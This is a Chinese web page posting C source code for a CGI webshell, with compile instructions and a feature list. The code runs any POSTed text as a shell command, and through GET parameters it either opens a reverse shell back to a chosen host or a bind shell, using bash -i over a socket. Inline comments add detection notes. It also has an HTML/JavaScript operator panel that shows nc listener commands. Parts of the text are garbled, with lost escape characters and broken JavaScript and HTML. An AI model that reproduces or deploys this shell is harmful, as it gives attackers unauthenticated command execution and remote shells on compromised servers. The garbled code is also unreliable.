Linux C代码实现cgi shell

高洛峰
发布: 2016-11-02 14:48:23

c语言实现cgi webshell

#include <stdio.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
  
 
  
/*
 * One key=value pair parsed out of QUERY_STRING by parser_get().
 * Both fields are fixed 100-byte buffers. parser_get() only bounds the
 * whole query string (<= 100 chars), not each key or value separately,
 * so the per-field limit is enforced only indirectly.
 */
struct get_data {
    char key[100];   /* parameter name; parser_get() writes a terminator after it */
    char value[100]; /* parameter value; parser_get() writes a terminator after it */
};
  
  
/*
 * POST handler: treats the raw request body as a shell command line, runs
 * it through popen() and streams the command's stdout back as the HTTP
 * response body.
 *
 * Defender's notes:
 *  - There is no authentication and no filtering of the command; any client
 *    that can reach this CGI gets command execution as the web server user.
 *  - Process-level indicator: a web server worker spawning /bin/sh -c (popen)
 *    with a command taken verbatim from a text/plain POST body.
 *  - CONTENT_LENGTH is read with atoi() and only upper-bounded (1500); a
 *    missing variable (getenv() == NULL) or a negative value is not handled.
 *  - fread()'s return value is ignored and the body is not NUL-terminated
 *    before popen() reads it as a C string.
 *  - `caracter` is a plain char; whether EOF is ever matched depends on char
 *    signedness, and the loop condition also stops on a NUL byte in the output.
 *
 * Never returns: every path ends in exit(0).
 */
void exec_cmd(void){
    /* CGI response header; the "\n\n" escapes appear to have been lost in
     * the page extraction, leaving literal line breaks in the string. */
    printf("Content-type:text/html

");
    FILE *command;
    int size = atoi(getenv("CONTENT_LENGTH"));
    if(size > 1500) {
        printf("Error> Post Data is very big");
        exit(0);
    }
    char *buffer = malloc(size+1); /* allocation result is not checked */
    fread(buffer,1,size,stdin);
    command = popen(buffer,"r");   /* body executed via /bin/sh -c; popen() result not checked */
    char caracter;
  
    while((caracter = fgetc(command))){
        if(caracter == EOF) break;
        printf("%c",caracter);     /* command output echoed unescaped into the HTML response */
    }
  
    pclose(command);
    free(buffer);
    exit(0);
}
  
/*
 * Print a libc error message for `err` via perror() and terminate.
 * Declared int but never returns (exit(EXIT_FAILURE)). Not called anywhere
 * in the visible listing.
 */
int error(char *err){
    perror(err);
    exit(EXIT_FAILURE);
}
  
/*
 * GET handler: splits QUERY_STRING into key=value pairs and, depending on
 * the "type" parameter, either connects out to host:port and attaches an
 * interactive bash to the socket ("reverse"), or listens on port and
 * attaches bash to the first accepted client ("bind").
 *
 * Defender's notes:
 *  - No authentication: any GET carrying type/port (and host) parameters
 *    reaches the fork()/execl("/bin/bash") paths below, as the web server user.
 *  - Network indicators: an outbound TCP connect from a CGI child to an
 *    arbitrary host, or a CGI child opening a new listening port.
 *  - Process indicators: web server child -> "bash -i" whose fds 0-2 are
 *    dup2()'d onto a socket.
 *  - Memory handling is unsound: the get_data array is allocated with a
 *    count of 0, host_x/type_x alias into that array after it is freed,
 *    and the two 100-byte malloc()s are leaked immediately.
 *
 * Never returns: every path ends in exit().
 */
void parser_get(void){
    /* CGI response header; "\n\n" escapes appear lost in page extraction. */
    printf("Content-type:text/html

");
  
    struct get_data *s;
    /* QUERY_STRING is assumed non-NULL here; main() only calls parser_get()
     * when it compared non-empty, but nothing in this function re-checks. */
    char *GET = (char *)getenv("QUERY_STRING");
    int i,number_of_get = 0,size_get = strlen(GET);
  
    /* Only the total query length is bounded, not the number of pairs. */
    if(strlen(GET) > 100)
        exit(0);
  
    /* number_of_get is still 0 at this point, so this is a zero-length
     * allocation that the loop below writes into. */
    s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  
    int element = 0;   /* index of the pair being filled */
    int positionA = 0; /* write offset into s[element].key */
    int positionB = 0; /* write offset into s[element].value */
    int id = 0;        /* 0 = currently reading a key, 1 = reading a value */
  
    for(i=0;i<size_get;i++){
        if(GET[i] == '='){
            id = 1;
            /* terminator; the escape in the original appears lost in extraction */
            s[element].key[positionA] = '';
            positionB = 0;
            continue;
        }
  
        if(GET[i] == '&'){
            id = 0;
            s[element].key[positionA] = '';
            s[element].value[positionB] = '';
            positionA = 0;
            positionB = 0;
            element++;
            continue;
        }
  
        if(id==0){
            s[element].key[positionA] = GET[i];
            positionA++;
        }
  
        if(id==1){
            s[element].value[positionB] = GET[i];
            positionB++;
        }
  
        /* last character of the query closes the final pair */
        if(i == size_get-1 && GET[size_get-1] != '&'){
            s[element].key[positionA] = '';
            s[element].value[positionB] = '';
            element++;
            continue;
        }
  
  
    }
  
    /* Both 100-byte blocks are leaked: the pointers are overwritten with
     * NULL right away, and later reassigned to point into s[]. */
    char *host_x = (char *)malloc(100);
    host_x = NULL;
    char *type_x = (char *)malloc(100);
    type_x = NULL;
    int port_x = 0;
  
    for(i=0;i<element;i++){
        if(strcmp(s[i].key,"type")==0)
            type_x = s[i].value;   /* aliases into s[]; no copy is made */
        else if(strcmp(s[i].key,"host")==0)
            host_x = s[i].value;   /* aliases into s[]; no copy is made */
        else if(strcmp(s[i].key,"port")==0)
            port_x = atoi(s[i].value);
    }
  
    /* s is released here, but type_x/host_x still point into it and are
     * dereferenced by every strcmp()/inet_addr() below. */
    free(s);
  
    if(type_x == NULL){
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
        printf("Something is wrong ... !!!");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    /* host_x is NULL when no host= parameter was given; strcmp(NULL, "")
     * here is undefined behaviour rather than a clean rejection. */
    if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
        printf("You must specify a target host ...");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if(strcmp(type_x,"reverse") == 0){
        struct sockaddr_in addr;
        int msocket;
        msocket = socket(AF_INET,SOCK_STREAM,0);
  
        if(msocket < 0){
            printf("<font color='red'>Fail to create socket</font>");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port_x);
        addr.sin_addr.s_addr = inet_addr(host_x); /* dotted quad only; inet_addr() failure (INADDR_NONE) is not checked */
  
        memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  
        /* Outbound TCP connect from the CGI process to the requested host. */
        if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
            printf("<font color='red'>Fail to connect</font>
");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        printf("<font color='006600'>Connect with sucess !!!</font>
");
  
        /* Child: stdin/stdout/stderr become the socket, then bash -i replaces
         * the process. The close()/exit() after execl() only run if exec fails. */
        if(fork() == 0){
            close(0); close(1); close(2);
            dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
            execl("/bin/bash","bash","-i", (char *)0);
            close(msocket);
            exit(0);
        }
  
        /* Parent: frees the already-freed aliases and exits; the child is
         * left running detached from the request. */
        free(host_x);
        free(type_x);
        exit(0);
    } else if (strcmp(type_x,"bind")==0) {
  
        int my_socket, cli_socket;
        struct sockaddr_in server_addr,cli_addr;
  
        if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            printf("<font color='red'>Fail to create socket</font>");
            exit(1);
        }
  
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(port_x);
        server_addr.sin_addr.s_addr = INADDR_ANY; /* listens on every interface */
        bzero(&(server_addr.sin_zero), 8);
  
        int optval = 1;
        setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  
  
        /* New listening port opened by a CGI child: a host-level indicator. */
        if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
            printf("<font color='red'>Fail to bind</font>");
            free(host_x);
            free(type_x);
            exit(1);
        }
  
        if (listen(my_socket, 1) < 0){
            printf("<font color='red'>Fail to listen</font>");
            free(host_x);
            free(type_x);
            exit(1);
        } else {
            printf("<font color='006600'>Listen on port %d</font>
",port_x);
        }
  
        /* Child blocks in accept(); the parent falls through to exit() below
         * so the HTTP response completes while the listener stays alive. */
        if(fork() == 0){
            socklen_t tamanho = sizeof(struct sockaddr_in);
  
            if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
                exit(0);
  
            }
  
            close(0); close(1); close(2);
            dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  
            execl("/bin/bash","bash","-i",(char *)0);
            close(cli_socket);
  
        }
  
    }
    free(host_x);
    free(type_x);
    exit(0);
}
  
void load_css_js(void){
printf("<style type="text/css">

#page-wrap {

    margin: 20px auto;

    width: 750px;

}



h1 {

    font-family: Impact, Charcoal, sans-serif;

    text-shadow: -1px 0 black, 0 1px black,

     1px 0 black, 0 -1px black;

    color: gray;

    border: #00ff00;

}



body {

    background-color: white;

}



input[type="text"] {

    margin-bottom: 10px;

    border: 1px solid gray;

    color: black;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



hr {

    color: gray;

}



input[type="submit"],input[type="button"] {

    margin-bottom: 10px;

    border: 1px solid gray;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



#bind_reverse {

    display:none;

}



label {

    position: relative;

    clear: left;

    float: left;

    width: 15em;

    margin-right: 5px;

    text-align: right;

    margin-top: 5px;

}





div.scroll {

    border: 1px solid gray;

    margin-bottom: 10px;

    color: black;

    font-family: Tahoma, sans-serif;

    padding: 5px;

    width: 745px;

    height: 295px;

    overflow: auto;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



#cmd_rev {

    position: absolute;

    margin-left: 450px;

    top: 150px;

    width: 250px;

    overflow: auto;

}



#cmd_bin {

    position: absolute;

    margin-left: 450px;

    top: 300px;

    width: 250px;

    overflow: auto;

}



#rev_s {

    display:inline;

}



#bind_s {

    display:inline;

}

</style>



<script type="text/javascript">

function exec_cmd(){

    var Rrequest = new XMLHttpRequest();

    var cmd_x = document.getElementById("xxx");



    var result = document.getElementById("result");



    if(cmd_x.value == '') return;

    if(cmd_x.value == 'clear' || cmd_x.value == 'reset') { result.innerHTML = ''; return; }

    var vv = cmd_x.value;



    vv = vv.replace(/</g,"&#60");

    vv = vv.replace(/>/g,"&#62");



    result.innerHTML += "<pre class="brush:php;toolbar:false;"><b>\$</b> "+vv+"
";     var bodyx = '';     Rrequest.open("POST",window.location.href,true);     Rrequest.setRequestHeader("Content-type","text/plain");     Rrequest.send(cmd_x.value);     Rrequest.onreadystatechange = function(){         if(Rrequest.status == 200){             if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){                 var complete_cont = Rrequest.responseText;                 complete_cont = complete_cont.replace(/,"<");                 complete_cont = complete_cont.replace(/>/g,">");                 result.innerHTML += '
'+complete_cont+'
';                 result.scrollTop = result.scrollHeight;             }         } else {             if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){                 result.innerHTML += "
<b>error !</b>
";                 return false;             }         }     } } function load_bind(){     var change_link = document.getElementById("change_link");     var linkz = change_link.innerHTML;     if(linkz == 'REVERSE/BIND') {         change_link.innerHTML = "COMMAND LINE";         document.getElementById("cmd_line").style.display = 'none';         document.getElementById("bind_reverse").style.display = 'block';     }          else {         document.getElementById("bind_reverse").style.display = 'none';         document.getElementById("cmd_line").style.display = 'block';         change_link.innerHTML = 'REVERSE/BIND';     } } function update_div(su,xxxd){     var status = document.getElementById(xxxd);     if(su.value == 0 || su.value == ""){         status.innerHTML = "";         return false;     }     if(xxxd == 'cmd_rev') {         status.innerHTML = "
nc -v -l "+su.value+"
";         return true;     } ");     printf(" var server_ip = '%s'; ",getenv("SERVER_ADDR"));     printf(" status.innerHTML = "
nc -v "+server_ip+" "+su.value+"
";     return true; } function change_div(ev,field){     if(ev.keyCode == 8 || ev.keyCode == 37 ||     ev.keyCode == 38 || ev.keyCode == 39 ||       ev.keycode == 40 || ev.keyCode == 46){         return true;     }     if(ev.charCode  57){         return false;     }          if(field.value > 65535){         return false;     }     return true; } function connect_xxx(div_t){     var get_s = '';     if(div_t == 'rev_s'){         var host_rev = document.getElementById("host_rev");         var port_rev = document.getElementById("port_rev");         if(host_rev.value == '' || port_rev == '' ) return false;         get_s = '/?type=reverse&host='+host_rev.value+'&port='+port_rev.value;     } else if(div_t == 'bind_s'){         var port_bind = document.getElementById("port_bin");         if(port_bin.value == '') return false;         get_s = '/?type=bind&port='+port_bin.value;     }     var target_div = document.getElementById(div_t);     target_div.innerHTML = "Wait ...";     var connect_s = new XMLHttpRequest();     connect_s.open("GET",window.location.href+get_s,true);     connect_s.timeout = 3000;     connect_s.ontimeout = function(){         target_div.innerHTML = "Listen OK !!!" }     connect_s.onreadystatechange = function(){         if(connect_s.status == 200){             if(connect_s.readyState==4 || connect_s.readyState=="complete"){                 target_div.innerHTML = connect_s.responseText;             }         } else {             if(connect_s.readyState==4 || connect_s.readyState=="complete"){                 result.innerHTML += "error !";                 return false;             }         }     }     connect_s.send(); } ");    }    int main(void){     if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();     if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();     printf("Content-type:text/html ");        printf(" ");     printf(" ");     printf("  C CGI SHELL =D  ");     load_css_js();     printf(" ");     printf(" "); printf("      
    

C - CGI SHELL

C0d3r: <b>webshell</b> | <a id='change_link' href='javascript:load_bind()'>REVERSE/BIND</a>
    
         
    
    
    
        
<b>Reverse Connection: <div id='rev_s'><font color='red'>Stop</font></div></b>
        
<label>Host/IP:</label><input type="text" id='host_rev'/>
        
<label>Port:</label><input type="text" id='port_rev' onkeypress='return change_div(event,this);' onKeyUp='update_div(this,"cmd_rev");' />
                 
        
        
<b>Bind Connection: <div id='bind_s'><font color='red'>Stop</font></div></b>
        
<label>Port To Listen:</label><input type="text" id='port_bin' style="width:50px" onkeypress='return change_div(event,this);' onKeyUp='update_div(this,"cmd_bin");'>
                 
    
    
     ");     return 0; }

编译:
gcc shell.c -o shell.cgi

功能:
1.反弹获得shell(target作为客户端)

1.jpg

2.监听获得shell(target作为服务端)

1.jpg

3.命令行执行

1.jpg

来源:php中文网